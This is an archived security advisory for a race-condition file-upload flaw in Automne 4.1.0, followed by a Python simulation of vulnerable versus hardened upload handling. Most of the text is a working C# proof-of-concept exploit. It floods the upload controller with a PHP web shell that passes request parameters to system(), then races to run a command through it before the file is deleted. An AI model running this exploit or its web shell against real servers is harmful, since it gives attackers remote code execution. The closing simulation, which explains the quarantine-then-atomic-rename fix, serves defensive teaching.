source: https://www.securityfocus.com/bid/46774/info

Automne is prone to an arbitrary-file-upload vulnerability. An attacker may leverage this issue to upload arbitrary files to the affected computer; this can result in arbitrary code execution within the context of the vulnerable application.

Automne 4.1.0 is vulnerable; other versions may also be affected.

Automne 4.1.0 Race Condition

// ------------------------------------------------------------------------
// Software................Automne 4.1.0
// Vulnerability...........Race Condition
// Threat Level............Very Critical (5/5)
// Download................http://en.automne-cms.org/
// Release Date............3/6/2011
// Tested On...............Windows Vista + XAMPP
// ------------------------------------------------------------------------
// Author..................AutoSec Tools
// Site....................http://www.autosectools.com/
// Email...................John Leitch <john@autosectools.com>
// ........................Bryce Darling <bryce@autosectools.com>
// ------------------------------------------------------------------------
//
//
// --Description--
//
// A race condition in Automne 4.1.0 can be exploited to bypass
// validation performed on uploaded files. The following proof of concept
// uploads a PHP script and then attempts to execute it before it is deleted.
//
//
// --PoC--

using System;
using System.Collections.Generic;
using System.Text;
using System.Threading;
using System.Diagnostics;
using System.Net.Sockets;

namespace RaceConditionExploit
{
    class Program
    {
        // Shared flag: both worker threads loop until the target process is observed.
        static bool trying = true;

        // Sends one raw HTTP request over a fresh TCP connection to localhost:80.
        static void SendReq(string req)
        {
            try
            {
                var bytes = ASCIIEncoding.ASCII.GetBytes(req);
                var client = new TcpClient();
                client.Connect("localhost", 80);
                using (var stream = client.GetStream())
                    stream.Write(bytes, 0, bytes.Length);
            }
            catch (Exception ex)
            {
                Console.WriteLine(ex);
            }
        }

        // Stops both loops once a "calc" process exists.
        static void CheckForCalc()
        {
            if (Process.GetProcessesByName("calc").Length != 0)
                trying = false;
        }

        static void Main()
        {
            var resets = new[]
            {
                new ManualResetEvent(false),
                new ManualResetEvent(false),
                new ManualResetEvent(false),
            };

            // Thread 1: repeatedly uploads shell.php through the upload controller.
            ThreadPool.QueueUserWorkItem(x =>
            {
                resets[0].WaitOne();

                while (trying)
                {
                    SendReq(@"POST /automne/automne/admin/upload-controler.php?atm-regen=shell.php HTTP/1.1
Host: localhost
Proxy-Connection: keep-alive
User-Agent: x
Content-Length: 193
Cache-Control: max-age=0
Origin: null
Content-Type: multipart/form-data; boundary=----x
Accept: text/html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

------x
Content-Disposition: form-data; name=""Filedata""; filename=""shell.php""
Content-Type: application/octet-stream

<?php echo '<pre>' + system($_GET['CMD']) + '</pre>'; ?>
------x--
");
                    CheckForCalc();
                }

                resets[1].Set();
            });

            // Thread 2: repeatedly requests the uploaded file, racing the server-side delete.
            ThreadPool.QueueUserWorkItem(x =>
            {
                resets[0].WaitOne();

                while (trying)
                {
                    SendReq(@"GET http://localhost/automne/automne/upload/shell.php?CMD=calc.exe HTTP/1.1
Host: localhost
Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.119 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=poiued4lsn8im03kb80t6131n3; osclass=9aae23cu0mqtopjv126loiu9n6; AutomneSession=mo70c3rth2qboupjpfbo010gv0

");
                    CheckForCalc();
                }

                resets[2].Set();
            });

            // Release both workers together, then wait for them to finish.
            resets[0].Set();
            resets[1].WaitOne();
            resets[2].WaitOne();
        }
    }
}
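The defect the advisory describes is a time-of-check/time-of-use ordering problem: the upload is written somewhere the web server already serves, validated afterwards, and deleted on failure, so a second request can reach the file during the validation window. The following Python simulation is an added example, not code from the advisory or from Automne; it models that ordering beside the standard fix (write to a quarantine directory outside the web root under a random name, validate there, then move into the served directory with an atomic rename only on success). The directories, the allow-list validator, the validation delay and the inert "script" payload are all constructed stand-ins.

```python
import os
import tempfile
import threading
import time

# Constructed demo of the two upload-handling orderings. A watcher thread
# plays the role of a concurrent HTTP client polling the served path.

ALLOWED_EXTENSIONS = {".png", ".jpg", ".gif", ".txt"}  # assumed allow-list
VALIDATION_DELAY = 0.05  # seconds; stands in for the validator's real latency


def is_allowed(filename, data):
    """Stand-in validator: extension allow-list plus a crude content check."""
    ext = os.path.splitext(filename)[1].lower()
    return ext in ALLOWED_EXTENSIONS and b"<?php" not in data


def vulnerable_upload(webroot, quarantine, filename, data):
    """Write into the served directory first, validate afterwards, delete on
    failure: the file is reachable for the whole validation window."""
    path = os.path.join(webroot, os.path.basename(filename))
    with open(path, "wb") as fh:
        fh.write(data)
    time.sleep(VALIDATION_DELAY)  # already served during this time
    if not is_allowed(filename, data):
        os.remove(path)
        return False
    return True


def hardened_upload(webroot, quarantine, filename, data):
    """Quarantine outside the web root under a random name, validate, then
    move into the served directory atomically only if accepted."""
    fd, tmp_path = tempfile.mkstemp(dir=quarantine)  # never under webroot
    with os.fdopen(fd, "wb") as fh:
        fh.write(data)
    time.sleep(VALIDATION_DELAY)  # nothing exists under webroot yet
    if not is_allowed(filename, data):
        os.remove(tmp_path)
        return False
    os.replace(tmp_path, os.path.join(webroot, os.path.basename(filename)))
    return True


def observe_window(handler, webroot, quarantine, filename, data):
    """Run a handler while a poller watches the served path.
    Returns (accepted, reachable_during_handling, exists_afterwards)."""
    target = os.path.join(webroot, os.path.basename(filename))
    stop = threading.Event()
    reachable = [False]

    def poll():
        while not stop.is_set():
            if os.path.exists(target):
                reachable[0] = True
            time.sleep(0.001)

    watcher = threading.Thread(target=poll)
    watcher.start()
    accepted = handler(webroot, quarantine, filename, data)
    stop.set()
    watcher.join()
    return accepted, reachable[0], os.path.exists(target)


def demo():
    """Exercise both handlers; returns results keyed by scenario."""
    webroot = tempfile.mkdtemp(prefix="webroot-")
    quarantine = tempfile.mkdtemp(prefix="quarantine-")
    script = b"<?php echo 'constructed marker'; ?>"  # constructed, inert text
    return {
        "vulnerable_script": observe_window(
            vulnerable_upload, webroot, quarantine, "shell.php", script),
        "hardened_script": observe_window(
            hardened_upload, webroot, quarantine, "shell.php", script),
        "hardened_benign": observe_window(
            hardened_upload, webroot, quarantine, "notes.txt", b"plain text"),
    }


if __name__ == "__main__":
    for name, (accepted, during, after) in demo().items():
        print(f"{name}: accepted={accepted} "
              f"reachable_during={during} exists_after={after}")
```

Running the block shows the rejected script becoming reachable while the vulnerable handler is still validating, and never becoming reachable under the quarantine-then-rename ordering; the benign file is accepted and appears only after validation completes. The two properties that matter for the fix are that the quarantine directory is not served and that the final move is a single atomic rename, so there is no state in which an unvalidated file sits under the web root.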